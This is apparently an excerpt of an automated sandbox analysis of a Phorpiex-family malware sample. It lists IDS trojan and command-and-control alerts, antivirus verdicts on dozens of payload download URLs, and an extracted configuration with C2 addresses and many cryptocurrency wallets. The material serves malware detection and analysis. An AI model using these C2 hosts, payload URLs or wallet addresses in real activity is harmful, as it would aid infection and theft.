    2025-03-09T13:55:27.364644+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49613 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:32.147306+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49615 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:35.936299+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49616 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:39.714414+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49618 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:43.589369+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49620 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:47.353905+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49622 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:51.287294+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49624 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:54.092835+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49625 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:57.284640+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49627 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:00.031906+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49628 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:02.792944+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49630 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:07.608857+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49632 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:11.370667+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49633 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:15.156822+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49635 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:18.934891+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49637 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:22.734701+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49639 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:26.604411+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49641 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:29.373772+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49642 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:32.158811+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49644 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:35.225653+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49645 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:37.980446+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49647 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:42.776940+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49649 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:46.543602+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49650 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:50.370269+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49652 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:54.188891+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49654 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:57.965212+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49656 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:01.855945+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49658 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:04.602502+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49659 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:07.352960+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49661 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:10.110738+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49662 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:12.876902+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49671 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:17.671813+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49673 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:21.450455+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49674 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:25.231064+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49676 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:28.996928+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49682 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:32.805077+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49684 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:36.690150+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49686 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:39.441513+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49687 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:42.185057+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49689 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:44.932867+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49690 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:47.691344+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49692 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:57:52.465399+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49693 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:57:56.231300+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49695 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:58:00.078103+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49697 | 45.93.20.18 | 80 | TCP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:53:55.194414+0100 | 2856563 | 1 | A Network Trojan was detected | 192.168.2.5 | 64335 | 1.1.1.1 | 53 | UDP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:53:58.710704+0100 | 2853292 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 185.215.113.66 | 80 | TCP
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-09T13:54:03.751692+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:05.548445+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:11.974570+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:14.260907+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:16.549798+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:18.805223+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:23.605572+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49587 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:27.367765+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49589 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:31.133646+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49591 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:34.930434+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49592 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:38.713259+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49594 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:54:42.727357+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49595 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:45.528581+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:47.781200+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:50.063393+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:52.327644+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49596 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:54:57.181848+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49598 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:00.966612+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49600 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:04.747416+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49601 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:08.528664+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49603 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:12.291313+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49605 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:16.297318+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49607 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:19.093052+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49608 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:21.862183+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49610 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:24.602892+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49611 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:27.364644+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49613 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:32.147306+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49615 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:35.936299+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49616 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:39.714414+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49618 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:43.589369+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49620 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:47.353905+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49622 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:55:51.287294+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49624 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:54.092835+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49625 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:55:57.284640+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49627 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:00.031906+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49628 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:02.792944+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49630 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:07.608857+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49632 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:11.370667+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49633 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:15.156822+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49635 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:18.934891+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49637 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:22.734701+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49639 | 45.93.20.18 | 80 | TCP
    2025-03-09T13:56:26.604411+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49641 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:29.373772+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49642 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:32.158811+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49644 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:35.225653+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49645 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:37.980446+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49647 | 91.202.233.141 | 80 | TCP
    2025-03-09T13:56:42.776940+010028482951A Network Trojan was detected192.168.2.54964945.93.20.1880TCP
    2025-03-09T13:56:46.543602+010028482951A Network Trojan was detected192.168.2.54965045.93.20.1880TCP
    2025-03-09T13:56:50.370269+010028482951A Network Trojan was detected192.168.2.54965245.93.20.1880TCP
    2025-03-09T13:56:54.188891+010028482951A Network Trojan was detected192.168.2.54965445.93.20.1880TCP
    2025-03-09T13:56:57.965212+010028482951A Network Trojan was detected192.168.2.54965645.93.20.1880TCP
    2025-03-09T13:57:01.855945+010028482951A Network Trojan was detected192.168.2.54965891.202.233.14180TCP
    2025-03-09T13:57:04.602502+010028482951A Network Trojan was detected192.168.2.54965991.202.233.14180TCP
    2025-03-09T13:57:07.352960+010028482951A Network Trojan was detected192.168.2.54966191.202.233.14180TCP
    2025-03-09T13:57:10.110738+010028482951A Network Trojan was detected192.168.2.54966291.202.233.14180TCP
    2025-03-09T13:57:12.876902+010028482951A Network Trojan was detected192.168.2.54967191.202.233.14180TCP
    2025-03-09T13:57:17.671813+010028482951A Network Trojan was detected192.168.2.54967345.93.20.1880TCP
    2025-03-09T13:57:21.450455+010028482951A Network Trojan was detected192.168.2.54967445.93.20.1880TCP
    2025-03-09T13:57:25.231064+010028482951A Network Trojan was detected192.168.2.54967645.93.20.1880TCP
    2025-03-09T13:57:28.996928+010028482951A Network Trojan was detected192.168.2.54968245.93.20.1880TCP
    2025-03-09T13:57:32.805077+010028482951A Network Trojan was detected192.168.2.54968445.93.20.1880TCP
    2025-03-09T13:57:36.690150+010028482951A Network Trojan was detected192.168.2.54968691.202.233.14180TCP
    2025-03-09T13:57:39.441513+010028482951A Network Trojan was detected192.168.2.54968791.202.233.14180TCP
    2025-03-09T13:57:42.185057+010028482951A Network Trojan was detected192.168.2.54968991.202.233.14180TCP
    2025-03-09T13:57:44.932867+010028482951A Network Trojan was detected192.168.2.54969091.202.233.14180TCP
    2025-03-09T13:57:47.691344+010028482951A Network Trojan was detected192.168.2.54969291.202.233.14180TCP
    2025-03-09T13:57:52.465399+010028482951A Network Trojan was detected192.168.2.54969345.93.20.1880TCP
    2025-03-09T13:57:56.231300+010028482951A Network Trojan was detected192.168.2.54969545.93.20.1880TCP
    2025-03-09T13:58:00.078103+010028482951A Network Trojan was detected192.168.2.54969745.93.20.1880TCP

    AV Detection

    Source: a0RkmvhSaf.exe | Avira: detected
    Source: http://91.202.233.141/1.exei/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.exe0 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1 | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpXr | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/4.exeswsock.dll.mui | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exeR | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exey/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exeshqos.dll.mui | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeq | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1% | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exeq/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.233.141/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/?k | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/4 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/9.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/4.exe | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpq | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exex | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.php6qcJ# | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/http://45.93.20.18/12345%s%s%s:Zone.Identifier%USERPROFILE%%windir%%s | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2a | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exedb | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/8.exe1. | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exe8- | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exeI/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1.exehttp://91.202.233.141/2.exehttp://91.202.233.141/3.exehttp://91.202.233.1 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/2.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exehn | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exe6 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/ws | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/11.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exehqos.dll.mui | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exeT | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/8.exe | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpIr | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exey- | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpshqos.dll.mui | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/v | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/1C: | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/5.exe)/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/6.exeQ/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exeA/ | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exe_- | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeL | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.php%temp%%s | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/7.exe233.141/3.exeshqos.dll.muid | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/10.exeg- | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/9.exer | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exeR | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.phpystem32 | Avira URL Cloud: Label: malware
    Source: http://twizt.net/newtpp.exeP0 | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/3.exe9/ | Avira URL Cloud: Label: malware
    Source: http://twizt.net/newtpp.exe | Avira URL Cloud: Label: malware
    Source: http://91.202.233.141/12.exe | Avira URL Cloud: Label: malware
    Source: http://twizt.net/peinstall.php | Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exe | Avira: detection malicious, Label: TR/Redcap.tfslp
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe | Avira: detection malicious, Label: TR/Agent.xvmwx
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exe | Avira: detection malicious, Label: TR/Agent.xvmwx
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe | Avira: detection malicious, Label: TR/Agent.wveom
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exe | Avira: detection malicious, Label: TR/Agent.krtrn
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | Avira: detection malicious, Label: WORM/Phorpiex.hrjck
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe | Avira: detection malicious, Label: TR/Agent.lvaok
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exe | Avira: detection malicious, Label: TR/Agent.lvaok
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exe | Avira: detection malicious, Label: TR/Agent.ihpob
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe | Avira: detection malicious, Label: TR/ATRAPS.dhtti
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exe | Avira: detection malicious, Label: TR/ATRAPS.dhtti
    Source: C:\Users\user\AppData\Local\Temp\203235335.exe | Avira: detection malicious, Label: TR/Agent.krtrn
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1360619
    Source: 7.0.sysludpvs.exe.400000.0.unpack | Malware Configuration Extractor: Phorpiex {"C2 url": ["http://91.202.233.141/", "http://45.93.20.18/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "lava@100le8y8x7w4uls8dhkuvtzten5jyvxgfj0crhw", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "EQBeqKxk-pwQ86KK0jwau5NKkjk9c-xtDR8kU5YP3OgROvlE", "Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn", "CSLKveRL2zqkbV2TqiFVuW6twtpqgFajoUZLAJQTTQk2", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exe | ReversingLabs: Detection: 68%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exe | ReversingLabs: Detection: 63%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe | ReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\5[1].exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exe | ReversingLabs: Detection: 71%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3[1].exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\7[1].exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exe | ReversingLabs: Detection: 34%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4[1].exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exe | ReversingLabs: Detection: 65%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9[1].exe | ReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe | ReversingLabs: Detection: 65%
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | ReversingLabs: Detection: 79%
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe | ReversingLabs: Detection: 63%
    Source: C:\Users\user\AppData\Local\Temp\203235335.exe | ReversingLabs: Detection: 71%
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe | ReversingLabs: Detection: 68%
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\2860723397.exe | ReversingLabs: Detection: 34%
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe | ReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe | ReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe | ReversingLabs: Detection: 52%
    Source: C:\Users\user\AppData\Local\Temp\634722489.exe | ReversingLabs: Detection: 95%
    Source: C:\Windows\sysludpvs.exe | ReversingLabs: Detection: 75%
    Source: a0RkmvhSaf.exe | Virustotal: Detection: 83%
    Source: a0RkmvhSaf.exe | ReversingLabs: Detection: 78%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Code function: 1_2_0040BFF0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040BFF0
